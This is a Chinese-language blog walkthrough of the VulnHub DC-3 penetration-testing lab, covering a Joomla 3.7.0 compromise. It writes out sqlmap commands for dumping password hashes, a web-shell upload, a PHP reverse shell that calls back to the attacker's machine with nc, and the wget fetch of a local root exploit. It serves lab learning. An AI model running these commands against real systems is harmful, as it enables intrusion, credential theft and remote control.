看完这篇 教你玩转渗透测试靶机vulnhub——DC3

简介: 看完这篇 教你玩转渗透测试靶机vulnhub——DC3

1ffd682271794d7aacfbd008dfd22c0a.pngVulnhub靶机介绍

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。


从靶机DC-3开始,只有一个最终的flag,只有拿到root权限才可以发现最终的flag。


Vulnhub靶机下载:

官网地址:http://www.five86.com/downloads/DC-3-2.zip

Vulnhub靶机安装:


下载好了把安装包解压 然后试用VMware即可。



Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用netdiscover发现主机


渗透机:kali IP :172.16.5.42 靶机IP :172.16.5.24

使用命令:nmap -sS -sV -A -n 172.16.5.24


就开了一个80端口,直接访问发现是Joomla 使用网站指纹工具whatweb识别靶机网址使用的web服务、系统版本、CMS系统等。

Joomla!是一套全球知名的内容管理系统,Joomla!是使用PHP语言加上MySQL数据库所开发的软件系统。


fc5ca04ee5a140da8b768fda5d300dc9.png

这里需要使用一个工具joomscan 因为最新kali没有 又去装了一下又学习了一下。


(JoomScan):是一个开源项目,旨在自动执行Joomla CMS部署中的漏洞检测和可靠性保证任务。该工具在Perl中实现,可以无缝轻松地扫描Joomla安装,同时通过其轻量级和模块化架构留下最小的占地面积。它不仅可以检测已知的攻击性漏洞,还能够检测到许多错误配置和管理员级别的缺陷,这些缺陷可被攻击者利用来破坏系统

git clone https://github.com/rezasp/joomscan.git  ##下载源码
cd joomscan  ##进入路径


perl joomscan.pl ##运行

一些最基本的参数 使用命令:perl joomscan.pl --url 172.16.5.24

通过上面的 探测我们可以知道Joomla 的版本 3.7.0 以及CMS的后台地址/administrator/ (说明工具还是强大的,爆赞👍)


②:漏洞发现:

通过上面信息收集的基本信息我们可以 去发现漏洞 使用工具searchsploit 搜Joomla 的版本号即可。

c31dfcd1a0674882aad702adc7f0dede.png

这里回显的是一个SQL注入的漏洞 根据这个思路我们需要对网页进行SQL注入的一些操作。

cp /usr/share/exploitdb/exploits/php/webapps/42033.txt joomscan-1.txt         
cat joomscan-1.txt 

97f93ba1ece54167b32b9b76a7de2fb9.png


③:SQL注入:

直接上sqlmap吧 sqlmap就是自动化检测sql的工具,发现了五个数据库。

sqlmap -u "http://172.16.5.24/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]



7ae0d95d3a6843c49afb8bdd777cf6be.png


sqlmap -u "http://172.16.5.24/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --current-db -p list[fullordering]

adbd550048624fd58f402b8e824ff2af.png

sqlmap -u "http://172.16.5.24/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables  -p list[fullordering] #列出表



ad1f9975e73a4619be476ca887e508c5.png


注入查询#__users表 发现有6列 知道列了就可以进行下一步字段的操作

sqlmap -u "http://172.16.5.24/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns  -p list[fullordering]


28c6b1d952514f51ae7d802e1c9ae758.png


注入查询#__users表的name、password字段

sqlmap  -u "http://172.16.5.24/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password" --dump  -p list[fullordering]



1ffd682271794d7aacfbd008dfd22c0a.png

在桌面随便建一个文件把password的hash密文放进去 然后使用john进行爆破 密码:snoopy

vim joomla-admin-hash #随便取个名字就就可以了
• 1


④:文件上传:

访问172.16.5.24/administrator/



登入进去输入:http://172.16.5.24/templates/beez3/html/shell.php 上传一个shell.php 然后执行 然后使用蚁剑连接🔗



进入虚拟终端看了一下权限 发现权限还是比较小 所以需要提权

⑤:提权:


编写反弹shell的PHP代码 监听4444端口,并执行脚本文件,将反弹靶机shell到kali

nc  -lvp 4444   #设置监听端口


<?php 
system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.16.5.42 4444 >/tmp/f');
?> 


2685504a32814204975237963f9c88f9.png


fb06b1fc8c9c4e778bfd7a38ff0c590e.png

使用searchsploit工具查找Ubuntu 16.04的提权漏洞

cp /usr/share/exploitdb/exploits/linux/local/39772.txt ubuntu.txt
cat ubuntu.txt

fb2bf49164fb42f29ccb9aab2f499cd3.png



然后根据他给的地址直接 wget 下载 但是我这边不行报错了 可能是访问不到github,所以只能windows 下载然后把他拖进去 不过问题不大 这也是一种思路,

使用命令:python -c "import pty;pty.spawn('/bin/bash')"


因为权限不够所以不能用蚁剑把39772的文件传上去,只能把39772.放到自己kali的网页上面了 然后在开个apache服务。
(DC-3是没有外网的所以我用的这种方法,方法有很多种大家可以多尝试,我也是第一次打,比较菜,大佬绕过就好!)


e7e03d8f6d8647c687258487eec4dbf3.png


e6a7a9807fc94ab38a5d35f34504bfd5.png


别忘了开启apache服务 :server apacher2 restart

使用命令:wget http://172.16.5.24/exploit.tar


然后解压:tar -xvf exploit.tar 最后运行提权文件 然后 进入root 看flag即可。

至此获取到了flag,渗透测试结束。


Vulnhub靶机渗透总结:

这是做的第四个靶场了,学习的知识点和一些细节就是 :

1.需要注意的细节就是 DC-3 不能访问github 然后就不能直接下载提权的文件

需要开个apache服务然后把文件放上面 在使用wget下载


新知识点:

①:学习了joomscan工具的使用(工具很强大!!)

②:学习了sqlmap 工具的使用 特别方便

③:学习了编写反弹shell 这个比较难吧因为也是第一次学习了好久

最后 自己也会把这系列的靶机继续更新,创作不易 希望对大家有所帮助!!

相关文章
|
5月前
|
安全 Oracle Shell
看完这篇 教你玩转渗透测试靶机Vulnhub——Hacksudo: Aliens
看完这篇 教你玩转渗透测试靶机Vulnhub——Hacksudo: Aliens
48 0
|
5月前
|
安全 Oracle 关系型数据库
看完这篇 教你玩转渗透测试靶机Vulnhub——Bluemoon: 2021
看完这篇 教你玩转渗透测试靶机Vulnhub——Bluemoon: 2021
37 0
|
5月前
|
安全 Oracle 机器人
看完这篇 教你玩转渗透测试靶机Vulnhub——Mr-Robot :1
看完这篇 教你玩转渗透测试靶机Vulnhub——Mr-Robot :1
47 0
|
5月前
|
SQL 安全 Oracle
看完这篇 教你玩转渗透测试靶机Vulnhub——Healthcare:1
看完这篇 教你玩转渗透测试靶机Vulnhub——Healthcare:1
55 0
|
6月前
|
安全 Linux 测试技术
如何使用Kali Linux进行渗透测试?
如何使用Kali Linux进行渗透测试?
205 0
|
2月前
|
网络协议 网络安全 Go
Kali下安装渗透测试常用工具dnsx和dirsearch
Kali下安装渗透测试常用工具dnsx和dirsearch
25 0
|
2月前
|
安全 Linux 测试技术
深入Kali Linux:高级渗透测试技术详解
深入Kali Linux:高级渗透测试技术详解
59 0
|
数据采集 存储 Linux
2022-渗透测试-Kali Linux字典生成工具Cewl使用指南
2022-渗透测试-Kali Linux字典生成工具Cewl使用指南
2022-渗透测试-Kali Linux字典生成工具Cewl使用指南
|
Web App开发 Java 测试技术
kali linux 网络渗透测试学习笔记(三)社会工程学之Java攻击:钓鱼网站制作
一.进入kali linux系统的命令行模式 输入代码; ifconfig 查看获得本机IP地址为:192.168.43.227 然后输入代码:   setoolkit   出现以下界面:       在set后输入1. 二.开始重复输入数字代号 三.写入钓鱼网站的目标 正如下图所示,我们需要先输入本机的IP地址以及端口,之后输入钓鱼网站的网址,这里我们以百度为例,因此输入https://www.baidu.com。
2241 0
|
前端开发 Linux 网络安全
kali linux 网络渗透测试学习笔记(一)Nmap工具进行端口扫描
一.利用Nmap扫描网站服务器的端口开放情况首先打开我们的kali linux才做系统,再打开其命令行模式,输入:nmap www.csdn.net 如下图所示:   因此,通过这个结果可以表明csdn上的端口开放了80端口以及443端口吗,这两个端口都十分重要,因为80端口适用于给用户呈现出数据,给用户看网站用的,443端口也是一个比较重要的端口。
2109 0